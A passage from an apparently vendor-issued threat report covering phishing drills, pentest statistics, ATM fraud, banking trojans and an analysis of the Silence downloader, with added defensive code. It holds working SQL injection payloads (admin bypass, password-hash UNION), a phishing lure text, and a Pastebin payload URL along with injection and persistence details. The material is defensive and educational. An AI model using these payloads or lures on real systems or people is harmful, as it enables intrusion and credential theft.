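        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/word/document.xml" ContentType="application/'
        'vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    )
    if with_macro:
        types_xml += f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
    types_xml += "</Types>"

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", types_xml)
        pkg.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Real VBA projects are OLE compound files; the OLE signature
            # bytes stand in for one here.
            pkg.writestr("word/vbaProject.bin",
                         b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64)
    return buf.getvalue()


def find_macro_indicators(data: bytes) -> list:
    """Return the reasons an attachment looks macro-enabled; empty if none.

    Handles only OOXML (zip-based) packages. Legacy binary .doc files are
    OLE containers and need a different parser.
    """
    reasons = []
    try:
        pkg = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return reasons  # not an OOXML package, nothing to say here
    with pkg:
        names = pkg.namelist()
        # 1. The VBA project part itself, wherever the package puts it.
        for name in names:
            if name.lower().endswith("vbaproject.bin"):
                reasons.append(f"package contains VBA project part: {name}")
        # 2. The content-type registration, which survives a renamed part.
        if "[Content_Types].xml" in names:
            types_xml = pkg.read("[Content_Types].xml").decode("utf-8", "replace")
            if VBA_CONTENT_TYPE in types_xml:
                reasons.append("content types declare a vbaProject part")
    return reasons


def assess_attachment(filename: str, data: bytes) -> str:
    """Mail-gateway style verdict for a single attachment."""
    reasons = find_macro_indicators(data)
    if not reasons:
        return "allow"
    # A macro project inside a file presented as a plain .docx is a mismatch
    # between what the name claims and what the package carries.
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext == "docx":
        return "block: macro project inside a file presented as .docx"
    return "quarantine: " + "; ".join(reasons)


if __name__ == "__main__":
    print(assess_attachment("contract.docx", build_sample_document(False)))
    print(assess_attachment("salary_rules_2020.docm", build_sample_document(True)))
```

The check says nothing about what the macro does, so it is a triage signal for quarantine or sandbox detonation rather than a replacement for them; a gateway that strips or blocks every inbound VBA project from outside the organisation removes the first scenario at the cost of a whitelist for the few legitimate senders.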
Credential phishing

The user receives a message prompting them to follow an external link to a website that the attackers claim to be legitimate. The website can mimic the web version of an e-mail service or an internet bank.

The layout of such a website is identical to that of the legitimate one, and its domain name often differs from the legitimate one in just one character. The malicious website asks for the user's confidential data (login and password in most cases).
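The 'differs in just one character' observation can be turned into a sender check. The block below is an added example for this edition, not code from the report: it classifies the domain of a sender address against a list of trusted domains, catching single-character typosquats by edit distance, digit and Cyrillic homoglyph substitutions by normalisation, and the trusted name embedded as a subdomain of an unrelated registered domain. The confusables table, the trusted domain `example.com` and the sample addresses are constructed for the example.

```python
# Multi-character confusables come first so "rn" is collapsed before the
# single characters are looked at. Table constructed for this example.
CONFUSABLES = [
    ("rn", "m"), ("vv", "w"),
    ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t"), ("8", "b"),
    ("\u0430", "a"), ("\u0435", "e"), ("\u043e", "o"), ("\u0440", "p"),  # Cyrillic a, e, o, p
]


def normalise(domain: str) -> str:
    """Lower-case the domain and fold look-alike characters to ASCII."""
    d = domain.strip().lower().rstrip(".")
    for bad, good in CONFUSABLES:
        d = d.replace(bad, good)
    return d


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance by plain dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def classify_sender(address: str, trusted_domains, max_distance: int = 1) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for a sender address."""
    if "@" not in address:
        return "unrelated"
    host = address.rsplit("@", 1)[1].strip().lower().rstrip(".")
    trusted = [t.lower() for t in trusted_domains]

    # The trusted domain itself or a real subdomain of it.
    for t in trusted:
        if host == t or host.endswith("." + t):
            return "legitimate"

    for t in trusted:
        # Trusted name used as a label prefix of someone else's domain:
        # owa.example.com.attacker.net, example.com-login.net
        if (t + ".") in host or host.startswith(t + "-") or host.endswith("-" + t):
            return "lookalike"
        # Homoglyph or digit substitution: examp1e.com, exarnple.com
        if normalise(host) == normalise(t):
            return "lookalike"
        # Typosquat within max_distance edits: examples.com, exampel.com
        if edit_distance(host, t) <= max_distance:
            return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    for sender in ("it@example.com", "it@examp1e.com", "owa@example.com.mail-reset.net"):
        print(sender, "->", classify_sender(sender, ["example.com"]))
```

The same function applies to the host of a link in the message body. A real deployment would compare the registrable domain taken from the public suffix list rather than the full host, and would pair this with DMARC verification, since an attacker only needs a lookalike domain when they cannot spoof the real one.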
Examples of phishing scenarios

Updated procedure for salary indexation

Type: malware launch

The favourite practice of attackers in such letters is using words like 'salary' and 'bonus' to attract attention. The results of our simulated attacks show that such scenarios are the most effective.

Subject line used in the drill: 'URGENT: New rules for salary indexation for 2020'

For security purposes, Microsoft Word by default does not run macros without the user's permission. For this reason, attackers include pictures that imitate 'system messages'. The 'message' tricks the user into activating the macro to view the content (as shown in the screenshot in the original report), without raising any suspicion. Hoping to read an important document, the user ultimately launches the execution of malicious code on their PC.
Outlook Web App password reset

Type: credential phishing

To distribute phishing letters among company employees, attackers often use a scenario involving the corporate e-mail service Microsoft Outlook.

The password change interface of the Outlook web version is the same for most organisations. This makes it easy for attackers to create a convincing phishing page, send it to the target company's employees and obtain their corporate credentials.

Text of the phishing letter used in the drill:

Your account has been accessed from the IP address 163.172.143.112. You should change your OWA password immediately.

To change your password:

1) Click here to proceed to the Change Password page

2) Enter your account information in the respective fields and then create a new password as follows:

Username: your account name
Current password: your account password
New password: create and enter a new password
Confirm new password: type in your new password again
Results of simulated attacks

To evaluate the results of such training, we analysed the data gathered during the simulated phishing attacks we had conducted for our clients over the past three years.

We divided the sample into two groups:

- companies whose employees encountered simulated phishing for the first time;
- companies that have been conducting such training for more than two years.

As the figures show, companies that conduct regular training for their employees can significantly reduce the percentage of potentially successful phishing attacks.
Despite these optimistically low numbers, companies should keep in mind that a single careless employee can open the door to intruders and give them the required access to the system. That is why phishing is the most popular attack vector: minimal investment delivers results promptly.

In view of this, it is vital to complement employee awareness with technical controls that catch phishing by its technical attributes: scanning attachments with antivirus and anti-spam solutions, checking sender addresses and links against a large list of indicators of compromise, and so on.


In companies that conducted phishing drills for the first time:

- every 4th employee opened an attached document and enabled the macro;
- every 3rd employee followed a phishing link;
- every 6th employee entered credentials on a phishing website.

In companies that have been conducting phishing drills for more than two years:

- every 35th employee opened an attached document and enabled the macro;
- every 28th employee followed a phishing link;
- every 70th employee entered credentials on a phishing website.
Penetration testing

Simulating attacks on a company's IT infrastructure is used to detect technical vulnerabilities. The procedure is called penetration testing, or pentest.

In 2019, we conducted 96 projects of this kind. The results of our analysis show that the overall level of security in companies still leaves room for improvement.

The financial sector leaves us with a much better impression than the rest, since it traditionally pays more attention to security than organisations from any other industry.

Protection level

After a pentest, the client receives a protection rating: high, medium or low.

The evaluation is based on the severity of the detected vulnerabilities, their number and a few additional factors. The evaluation criteria and their weights vary depending on the specific organisation.

In the selection presented below, we divided the tested companies into two large groups: financial companies, and all others that possess an IT infrastructure.

The types of tests were divided by the type of object examined:

- web applications;
- external infrastructure;
- internal infrastructure;
- mobile apps.

Half of the systems we worked with demonstrated a low level of protection.
Looking only at financial companies, we see that the low rating comes up much less frequently than in the other industries. At the same time, 14% of financial organisations have a high degree of security.

[Figure: Protection level, finance vs other industries; values shown on the chart: 54%, 59%, 32%, 41%, 14%]

Banks and payment systems put a lot of emphasis on cybersecurity, since their IT infrastructure opens a path to large sums of money.

If we analyse how these indicators correlate with project types, we see a similar picture. It should be noted that the internal infrastructure remains the most vulnerable
Attack objectives

During penetration testing, our experts essentially imitate the actions of a potential attacker. The simulation is normally based on several assumptions about the adversary: what they are after, what they know about the target and what kind of access to the target system they may have. The goal of penetration testing is to check whether an intruder can complete their objectives under the conditions mentioned above.

In general, we assume that potential attackers aim to gain financial or other personal benefits, or to inflict damage on a company or its clients. We elaborate these aims in greater detail depending on the objects of research and the intruder's role.

1. Confidential and personal data theft

In 2019, clients' confidential data were obtained in 61% of external pentest projects. Personal data was successfully obtained in 38% of cases.

In these projects, we considered a model of the external intruder who acts via the Internet and has no additional information about the system. As we can see, despite constant discussions about personal data protection, many companies disregard this issue, remaining easy targets for intruders.

[Callout: 61% of external pentesting projects resulted in access to sensitive customer data]
2. Source code access

In external penetration testing projects, the services' source code was accessed in 43% of cases.

3. Internal network access

Access to the internal network was gained in every fourth external penetration testing project. Given the often-encountered high degree of vulnerability of internal infrastructures, intruders can easily go deeper and gain control over most of the company's IT assets.

4. Domain infrastructure control

Our experience shows that companies still suffer major difficulties with the security of their domain infrastructure. Most of the organisations we tested for internal penetration turned out to be vulnerable. Specialists managed to gain domain administrator rights in 9 cases out of 10.

Domain administrator rights give intruders full control over the organisation's IT assets, allowing them to gain access to confidential and personal data, an organisation's most valuable resources.

[Callout: share of pentesting projects that resulted in a compromise; the figure did not survive extraction]

[Callout: 89% of internal pentesting projects resulted in access to domain administrator privileges]
Vulnerabilities rating

This rating includes vulnerabilities of medium and high severity. All test objects are divided into three categories:

- web applications and external infrastructure;
- internal infrastructure;
- mobile apps.

Web applications and external infrastructure

The most frequent problem is access control vulnerabilities. We detected them in 67% of projects.

Despite the large number of technologies that minimise hand-written SQL in applications, it has still proved impossible to eliminate SQL injection completely. It was encountered in 24% of cases.

SSRF and XXE appeared in 13% and 11% of projects, respectively. It should be noted that their severity often did not exceed the medium rating, since in most of these cases it was not possible to build a practical attack chain from them. (That assessment is per system; an SSRF or XXE that reaches internal services or a cloud metadata endpoint can be critical.)

Vulnerabilities associated with file upload (16%) and the possibility of unauthorised file reading (14%) were also rather frequent in 2019.
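Why parameterisation, rather than 'technologies that minimise SQL', is the fix: the block below is an added example for this edition, not code from the report. It shows a user lookup written the vulnerable way beside the same lookup with a bound parameter, run against a constructed in-memory SQLite database with two constructed payloads, one that widens the WHERE clause to return the admin row and one that pulls password hashes through a UNION (the kind of confidential-data access the statistics above count). The table, the users and the payloads are assumptions of the example.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for a web app's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT UNIQUE, "
        "password_hash TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (login, password_hash, is_admin) VALUES (?, ?, ?)",
        [("alice", "$2b$12$alice-hash", 0), ("admin", "$2b$12$admin-hash", 1)],
    )
    return conn


def lookup_user_vulnerable(conn, login: str) -> list:
    """VULNERABLE: the user-controlled value is spliced into the SQL text,
    so a quote character in `login` changes the meaning of the statement."""
    sql = f"SELECT login, is_admin FROM users WHERE login = '{login}'"
    return conn.execute(sql).fetchall()


def lookup_user_safe(conn, login: str) -> list:
    """FIXED: the value travels as a bound parameter and is never parsed as SQL."""
    return conn.execute(
        "SELECT login, is_admin FROM users WHERE login = ?", (login,)
    ).fetchall()


# Two constructed payloads of the kind found during the tests: the first
# widens the WHERE clause, the second pulls another column through a UNION.
# The trailing "--" comments out the closing quote the application appends.
BYPASS_PAYLOAD = "x' OR is_admin = 1 --"
EXFIL_PAYLOAD = "x' UNION SELECT password_hash, is_admin FROM users --"


def demo() -> dict:
    """Run both lookups against both payloads and return what each gives back."""
    conn = make_demo_db()
    return {
        "vulnerable_bypass": lookup_user_vulnerable(conn, BYPASS_PAYLOAD),
        "vulnerable_exfil": sorted(lookup_user_vulnerable(conn, EXFIL_PAYLOAD)),
        "safe_bypass": lookup_user_safe(conn, BYPASS_PAYLOAD),
        "safe_exfil": lookup_user_safe(conn, EXFIL_PAYLOAD),
        "safe_normal": lookup_user_safe(conn, "alice"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:18} {rows}")
```

The two payloads return nothing from the parameterised version because the driver sends the value separately from the statement text; no escaping is involved, which is why the fix holds for every database engine and not only for SQLite. The residual injection surface in a parameterised code base is the places where identifiers or ORDER BY clauses are still assembled from input, which is what the 24% figure above is usually made of.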
Internal infrastructure

The attack technique that hackers have been using for over 10 years, capturing NTLM hashes (typically by answering LLMNR/NBT-NS name requests or relaying the authentication to another host), is still in use today. It was successfully used in 78% of internal penetration testing projects. The standard countermeasures are disabling LLMNR and NetBIOS name resolution, enforcing SMB signing and moving away from NTLM wherever Kerberos can be used.

Weak or default passwords helped intruders advance through the internal network in 22% of cases, whereas insecure storage of critical data was exploited in 44% of projects.

The problem of weak and default passwords is much more frequent in the internal network than in web applications: 22% vs 6%.
Mobile apps

Insecure data storage is the most frequent vulnerability; it was discovered in 67% of projects.

Insecure data transfer issues were encountered in 49% of projects.

XSS via the WebView component, which integrates web pages into mobile apps, was successfully exploited in 23% of projects.

Vulnerabilities specific to mobile apps, such as phone number enumeration and SMS limit abuse, were encountered in 17% and 14% of projects, respectively.
[Figure: mobile app vulnerabilities by share of projects, with risk level on a 0 to 100 scale: Insecure Data Storage 67%; Disclosure (value garbled); Background (value garbled); Session Issue (value garbled); XSS via WebView 23%; User/Phone Enumeration 17%; SMS Abuse 14%; Path Traversal 9%; Exported Issue 8%]
Process-based approach 
to vulnerability 
detection 


Continuous penetration 
testing 


When we conduct phishing simulations on a regular basis, 
we see a Significant progress of employees. They recognise 
techniques of attackers more frequently, and thus the 
company's protection level grows. 


However, this approach does not work in the case of 
penetration testing. A single pentest cannot protect from new 
vulnerabilities. It only temporarily increases the protection level, 
without helping to build the process. 
According to our three-year statistics,
companies that conduct annual penetration tests
have the same number of vulnerabilities.
This is not because the cybersecurity department
fails to patch the detected vulnerabilities.
The fact is that new vulnerabilities manage
to appear over this time.


This data showed that other technologies are
necessary to secure the external perimeter. Our
decision was to conduct continuous pentesting.


The industry shows the same trend for the 
process-based approach all over the world. The 
idea is to establish a continuous process of 
vulnerability detection. 


As part of this approach, we have developed 
a special online platform which combines the 
experience of our experts and the power of 
automation. 




Thus the Continuous Penetration Testing service,
or CPT, appeared. It makes it possible to continuously
track changes on the IT perimeter, to detect new
assets and to conduct individual penetration tests.


This approach makes it possible to monitor the security
level of the external perimeter and to reduce
the lifetime of vulnerabilities.
Vulnerability scanner is no cure-all




Automated scanners are extremely 
popular, but they are not always effective 
at searching for vulnerabilities. 


We analysed the results of automatic
scans conducted in different companies.
It turned out that we encountered only
600 unique vulnerabilities out of the total of
86,000 included in the scanner database.
One of the most popular scanners is thus able
to detect less than 1% of the number
claimed by its manufacturers.
We do not suggest abandoning
automated tools: we use them ourselves
and are really fond of them. But it is vital
to understand that a scanner is no cure-all,
most of its plugins are likely outdated,
and the most critical vulnerabilities can
usually be detected only manually.


Based on our experience, we recommend
not relying on scanners completely and
always checking their results manually.


A plugin is an algorithm that checks for the
presence of a particular vulnerability. Each plugin
corresponds to one unique vulnerability.
For the past 18 months, cybercriminals
have been proving to banks
that they are vulnerable even in the areas
where they feel relatively safe. We are
talking about ATMs. In the previous
Threat Zone, we posted rather optimistic
that can be drawn from the said figures
are still valid. However, new information
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to this part of the banking infrastructure. 
As for other threats, the attackers did
not surprise us with fundamentally new
vectors, targets, and tools, save for the fact
that they have updated their malware. At
the same time, several groups who had
earlier gone off the radar have now re-
entered the scope of the cybersecurity
Last year, we noted that attackers lost their
interest in ATMs: the number of
attacks on these machines is decreasing
with each year, at least when it comes
to malware attacks. According to the European
Association for Secure Transactions (EAST),
in January — June 2019, 35 cyberattacks
on ATMs were reported in that part of the
world, a 43% drop from the same
period of 2018. Malicious software was used
in only three cases. Otherwise the attackers
used the good old BlackBox, leading to just one
successful attack, in which the adversary stole
less than €1,000.¹
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Source: European Association for Secure Transactions (EAST) 


At the same time, EAST reports an increase
in physical attacks on ATMs. The number of
break-ins for the first six months of the previous
year went up 16% to nearly 2.4 thousand.
However, losses from these types of attacks
have decreased by a quarter (€11.4 million).


Physical methods may not imply the most
sophisticated exploitation of hardware and
software vulnerabilities, but they are an exploitation
nonetheless. This cannot be disregarded.
Apart from that, there is a small percentage
of criminal groups who have sufficient
resources to organise advanced campaigns.
In 2019, we observed two of them.
[Chart: the number of TRF attacks on European ATMs in the first six
months of 2015-2019. Source: EAST.]
The rates of ATM attacks are increasing, as
are the amounts stolen in these attacks.
In January — June 2019, EAST recorded 10.7
thousand fraud incidents, up on the same period
of the year before. Losses
for the first half of 2019 reached €124 million, a
16% increase from the previous year.
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involve the transaction reversal fraud TRF — 
that makes up 53% of all ATM attacks.²
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software, but rather exploits the existing flaws 
of the ATMs themselves. In a TRF attack 
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initiated cash withdrawal. During the process, 
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operation which fools the ATM into dispensing 
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to the bank that the transaction had been 
reversed. One way this can be done is if the
criminal forcibly blocks the ATM from retracting
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The EAST survey covers primarily Western 
Europe. In advanced economies, financial 
institutions pay a lot of attention to 
cybersecurity. This is exactly the reason why 
the number of malware attacks on ATMs has 
been so insignificant: the methods are too 
complicated and require physical presence, 
while the value of the stolen assets is not so 
high as in the cases with ATM theft or breaches 
of other parts of the banking infrastructure. 
High-tech theft through ATMs is only possible
for large and well-organised criminal groups.


In October 2019, the U.S. Department of Justice
reported the arrest of 18 members of one of the
largest cybercrime groups, who for five years
had been engaged in a high-tech skimming
operation across 18 states. The amount stolen
exceeded $20 million.


The DOJ did not describe in detail the scheme
of the fraud, but the names, surnames and
nationality of the suspects, as well as the
circumstances of the case itself, suggest
that the defendants are associated with the
Mexican company Intacash. This organisation
has been a front for large frauds with the
use of ATMs since 2015.⁵ The suspects
used Bluetooth-based skimmers installed on
components connected to the card reader and
PIN pad. The attackers chose terminals located
in the most popular tourist spots in Mexico and
bribed ATM service specialists to install the
skimming devices.


In late March 2019, Mexican police arrested
two people suspected of running Intacash.⁶
It was reported that the detainees had been
under FBI investigation.⁷
5. Who's behind Bluetooth skimming in Mexico? // Krebs on
Security.

6. Two Romanian men arrested with cash, gun at Puerto
Morelos // Riviera Maya News.
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in Mexico // Krebs on Security. 
Lazarus: HR fraud


When it comes to ATMs and malware, Lazarus,
one of the most advanced cybercrime groups,
presumably supported by the DPRK government,
is sure to pop up. Over the past year, we have
heard about two incidents of attacks on ATMs
attributed to the group.


In December 2018, Redbanc, which
essentially controls all of the ATMs in Chile,
was compromised using social engineering.
The attack vector passed through LinkedIn,
a social network for business contacts and
job search. The attackers posted a vacancy
ad for a developer on the website, and a
Redbanc employee responded to it. Soon, the
attackers contacted him and even conducted
an interview on Skype. Then they asked the
employee to download and run ApplicationPDF,
a programme that was supposed to generate
a job application form. In reality, the executable
file was malicious but managed to bypass the
antivirus protection.⁸ ⁹


Samples of the ApplicationPDF.exe file, which
were publicly available, turned out to be
downloaders of PowerRatankba, Lazarus' own
malware. It collects and sends to the attackers
basic information about the infected system:
username, technical specifications and other
information about the OS, proxy settings, and
a list of running processes. PowerRatankba
also checks whether the ports for connection
via the RPC, SMB, and RDP protocols are open.
If the malware manages to obtain
system administrator privileges, it downloads
a PowerShell script for the next stage
(PowerShell is a software engine and scripting
language for Windows administration).
8. [...] en diciembre [EXCLUSIVE: Redbanc suffered an
intrusion by North Korean hackers in December] // trendTIC.

9. North Korean hackers infiltrate Chile's ATM network after
Skype job interview // ZDNet.

10. Disclosure of Chilean Redbanc intrusion leads to Lazarus
ties // Flashpoint.


The earliest attacks of the group
named Lazarus (also known as
Hidden Cobra) had, during the first few
years, an exclusively political motive,
as they were directed against the
government and organisations of South Korea.


Later, the attackers
switched to financially motivated
attacks. One of the most high-
profile campaigns of this kind was
the hacking of the Bangladesh
Central Bank in 2016. Lazarus
attempted to withdraw about
$850 million through the SWIFT
system, but a mere $81 million
was stolen due to a spelling error.


Lazarus attacks are technically
sophisticated and precisely
targeted. In their hacking
campaigns, the group uses
its own malware which, as
a rule, is tailored for the target
infrastructure.
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Silence: beyond Europe 


Another group that specialises in complex attacks on ATM networks
is Silence. Among other things, the adversary excels in social
engineering techniques.


In 2019, the group, which had previously only attacked banks in Russia
and Europe, expanded its presence. In the spring, Silence stole
money from Sri Lankan Dutch-Bangla Bank ATMs. First, Silence
attacked the Dutch-Bangla ATMs in Cyprus, Russia and Ukraine,
and in late May they managed to withdraw funds from
Sri Lanka itself. The damage from the attack amounted to over $3
million.¹⁴ ¹⁵


Later it became known that at about the same time the group
attacked banks in India, Kyrgyzstan, Chile, Bulgaria and Ghana.¹⁶
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14. Three banks hit by cyberattacks // Daily Star. 
15. Bangladesh cyber heist 2.0: Silence APT goes global // Group-IB. 
16. Silence 2.0: going global // Group-IB. 
The past year has been marked by major
updates to some well-known but forgotten
malware.
The Ursnif banking trojan was discovered back
in 2000. Six years later, experts discovered
Gozi, another trojan that is partially based on
Ursnif. Due to similarities in functions and code,
analysts often use the two names interchangeably.




In 2019, Ursnif operators were consistently
limiting their campaigns to specific countries.
In January and February of that year, Japanese
banks received lots of Ursnif samples collecting
not only banking but also personal data of
customers. These samples terminated if the
system language of the infected machine was
not Japanese.¹⁸ ¹⁹ In March, similar campaigns
were reported in Italy, but this time the
attackers did not limit their targets to banks
and the sample's operation was not tied to the
language settings.²⁰
stolen using
GozNym, a hybrid
malware²¹




17. Gozi (Malware Family) // Malpedia (Fraunhofer FKIE).

18. New Ursnif variant targets Japan packed with new
features // Cybereason.

19. Ursnif banking trojan variant steals more than financial
data // BankInfoSecurity.

20. The Ursnif gangs keep threatening Italy // Yoroi Blog.

21. GozNym malware: cybercriminal network dismantled in
international operation // Europol.


In 2016, cybersecurity experts discovered
GozNym, a hybrid of Gozi and Nymaim. The
latter is a rather aggressive dropper: it delivers
and implants additional malware on the infected
machine. The dropper uses multiple techniques
to maintain its foothold on the system, as well
as to bypass cybersecurity solutions. Nymaim
is always distributed in addition to another
malware.


Nymaim is believed to be run by a small closed
group that keeps its source code from leaking.
Hence, it is possible that any hybrid based
on this malware is developed by the group
itself. GozNym in this case is most likely not an
exception, especially given the fact that Gozi
source code was leaked twice before (in 2010
and 2015).²²


In May 2019, Europol announced the arrest
of GozNym operators. The group, which spread
across five countries, managed to steal about
$100 million from 41 thousand victims, mainly
companies and their authorised banks.²³


computers were infected by
GozNym, most of them owned by
private companies
and their authorised banks.


22. Meet GozNym: the banking malware offspring of Gozi
ISFB and Nymaim // Security Intelligence.

23. GozNym malware: cybercriminal network dismantled in
international operation // Europol.
Retefe: legitimate
cover and quiet
proxy


The banking trojan Retefe was first described
in 2015.²⁴ Already then, malware analysts noticed that
Retefe was used in just three countries: Sweden,
Switzerland and Japan. Another specific
feature of Retefe was its operation mechanism.
Typically, such malware steals credentials from
the victim's web browser. But Retefe creates a
forged certificate to deploy a full-fledged man-
in-the-middle attack and to redirect the victim's
traffic to a banking web site via a proxy server
controlled by the attackers.


In 2018, Retefe was not particularly active, but
in 2019 this malware asserted itself in a loud
and clear manner. In the new campaigns, the
trojan retained its specific features: limited
geography (compared to 2015, it became
purely European: Sweden, Switzerland, Austria,
Great Britain) and traffic proxying. At the same
time, innovations emerged.


Firstly, some Retefe samples began operating
disguised as an installer of a harmless
programme. A Python script is packed in the
primary executable file, which goes on to
create two other executable files in the victim's
storage. One of them is a legitimate installer
of the trial version of the Convert PDF to Word
Plus application; the other one runs in parallel
and is a Retefe downloader. In some particular
attacks committed on macOS computers, the
downloader was distributed as an Adobe
software installer.


24. Retefe banking trojan targets Sweden, Switzerland and 
Japan // Unit42 (Palo Alto Networks). 
the risk of traffic interception by a third party
(in TOR, packets go through several
machines before reaching their destination).
Furthermore, a connection to TOR in a
corporate network looks more suspicious than
the standard SSL protocol used by stunnel.²⁵

Silence: the new
downloader


The aforementioned Silence group has not
only expanded the geography of their attacks,
but also improved one of their tools, the
downloader.
In February of this year, we spotted the Silence
email campaigns targeted at banking clients.
The campaigns have the following new
features.


The malicious DLL was displayed in the form 
of Microsoft Word tables. 


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To download additional code, the attackers 
used pictures and texts stored on Imgur and 
Pastebin, both public hosting services. 
a part of another malware, Parallax, which is
sold on darknet forums, was used.
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Silence 
downloader 
analysis 


Downloading and 
execution of the 
downloader 


The Silence downloader's route to a system
consists of three stages. In the first stage,
a user receives an email with an attachment.
The attached document contains a macro
responsible for receiving the malicious DLL file.
Finally, the DLL allows the attacker to download
and run the executable file.


Stage 1. A message with 
malicious attachments 


The attackers distribute malware via email
signed by a certain Vika. The message itself, with
the subject line 'Tramp novosti posmatri' (roughly
translated as 'Trump news, check it out'), offers
footage of secret negotiations. In reality, the
email contains a malicious DOC file with a
macro.


Stage 2. DOC file with
macros


A DLL is hidden in the body of the malicious 
document. The DLL contents are displayed 
in the form of tables embedded into the 
document. 


A macro is used to retrieve a DLL file from
the tables. It converts each table cell into
4 bytes of the future DLL: the cell text is
processed as an integer value.


For example:


- 9460301 is converted into 4d 5a 90 00;
- 3 is converted into 03 00 00 00;
- 4 is converted into 04 00 00 00.


The malicious document contains both 64-bit
and 32-bit versions of the library. The contents
of the 64-bit library are located between the
keywords 'SeasonValue' and 'AppendCell'; the
contents of the 32-bit library are between
'Visions' and 'FindWords'. The bitness of the
loaded library is selected in accordance with
the bitness of the process.
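As an added example (not code from the report, nor from the Silence macro itself), the following script carves the embedded DLL out of the table cells by applying the same cell-to-bytes rule and the marker keywords described above; the flat list of cells and the sample values are assumptions made for the example.

```python
"""Added example (not from the original report): rebuild the DLL that the
Silence macro hides in Word table cells, so that an analyst can carve it out
of a document for static analysis without ever running the macro.

Assumptions (hypothetical): the table cells are handed in as one flat list of
strings in document order, and the marker keywords from the report appear in
that same list as cells of their own.
"""
import struct
from typing import Dict, List, Optional

# Marker keywords quoted in the report: the 64-bit library sits between the
# first pair, the 32-bit library between the second pair.
MARKERS = {
    "x64": ("SeasonValue", "AppendCell"),
    "x86": ("Visions", "FindWords"),
}


def cell_to_bytes(cell_text: str) -> bytes:
    """Interpret one cell exactly like the macro does: the text is an integer,
    emitted as 4 little-endian bytes.  '9460301' -> 4d 5a 90 00 ('MZ', the
    DOS header magic that every PE file starts with)."""
    value = int(cell_text.strip())
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"cell value does not fit in 32 bits: {value}")
    return struct.pack("<I", value)


def cells_between(cells: List[str], start: str, end: str) -> Optional[List[str]]:
    """Return the cells strictly between the two marker cells, or None if a
    marker is missing (i.e. this bitness is not embedded)."""
    try:
        first = cells.index(start) + 1
        last = cells.index(end, first)
    except ValueError:
        return None
    return cells[first:last]


def carve_library(cells: List[str], bitness: str) -> Optional[bytes]:
    """Carve the DLL of the requested bitness ('x64' or 'x86')."""
    start, end = MARKERS[bitness]
    body = cells_between(cells, start, end)
    if body is None:
        return None
    # Empty cells (padding in the table) carry no bytes.
    return b"".join(cell_to_bytes(c) for c in body if c.strip())


def carve_all(cells: List[str]) -> Dict[str, bytes]:
    """Carve every embedded library and keep only those that look like PE
    files, which is the sanity check an analyst applies before unpacking."""
    found = {}
    for bitness in MARKERS:
        blob = carve_library(cells, bitness)
        if blob is not None and blob[:2] == b"MZ":
            found[bitness] = blob
    return found


# Constructed sample: the first three cells of each library are the values the
# report quotes (9460301, 3, 4); real documents hold thousands of cells.
SAMPLE_CELLS = [
    "Visions", "9460301", "3", "4", "FindWords",
    "SeasonValue", "9460301", "", "3", "4", "AppendCell",
]

if __name__ == "__main__":
    for bitness, blob in carve_all(SAMPLE_CELLS).items():
        print(bitness, len(blob), "bytes:", blob.hex(" "))
```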


Stage 3. DLL


When the library is received, the macro copies
it to the [...] directory under the name [...]
and loads it. Next, the macro
calls the function [...] from [...],
and after that a new version of the Silence
downloader is delivered to the infected machine.


In the recent campaign, the contents of the
malware were downloaded from Pastebin,
a service for hosting text files:
pastebin[.]com/raw/Jyujxy/ziSfelela;
after the campaign this file appeared to be
unavailable.
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Getting the 
unpacked 
downloader 


The downloader writes its code twice to the 
address space of the process. 


First injection: how this goes 


During this injection, Silence uses a tool for 
remote access to the infected system. This 
component is taken from the downloader of 
Parallax, a malware sold on darknet forums. 


The malware creates the cmd.exe child
process in a suspended state. Next, the
malware overwrites the entry point of the
created process.


Code used for overwriting
the entry point of the cmd.exe process

[Disassembly listing omitted]


The malware also writes the decrypted code and 
data to the allocated memory area. 


Before resuming the process, the [...]
constant (see code above) is
replaced with the address of the allocated
memory area where the malware code and
data were written.


First injection: the result 


The malicious code that starts as a result of
the first injection is quite similar to the code
of [...]. The imported functions are
obtained via CRC32 values of their names.


As a result of the execution of the malicious
code, the malware downloads
the image from [...]
and saves it as


%TEMP%/<random-hex-string>.png








The code fragment that downloads the
image is also similar to the code fragment of
[...] that downloads the executable
file. This shows that the attackers reuse
the code at certain stages of the malware's
operation.
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Second injection 


The content of the downloaded image is used
to obtain the executable file of the Silence
downloader, as well as the code and data that
execute it in the address space of the [...]
child process (not to be confused with the
process having the same name, which is used
during the first injection).


The obtained code registers the file
downloaded from [...] to autorun. It goes as follows:
during the execution of the received code,
the executable file is copied to the disk in
an arbitrary folder located in the [...]
directory, with the name [...];
a shortcut named [...] is created in the [...] directory,
which is then copied as [...] to
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.


After that, the malicious code executes the
Silence downloader in the address space of
the [...] child process, which is used
during the second injection.





Communication 
of the downloader 
with the C2 server 


The main cycle of communication with the C2
server is shown below.


Main cycle of communication with the
control server (decompiler pseudocode, partially
recovered; unreadable fragments are marked with ...)


    __thiscall Main_sub_401168(main ...)
        cc_data *cc_data;                 // ...
        handler_data *handler_data;       // edi
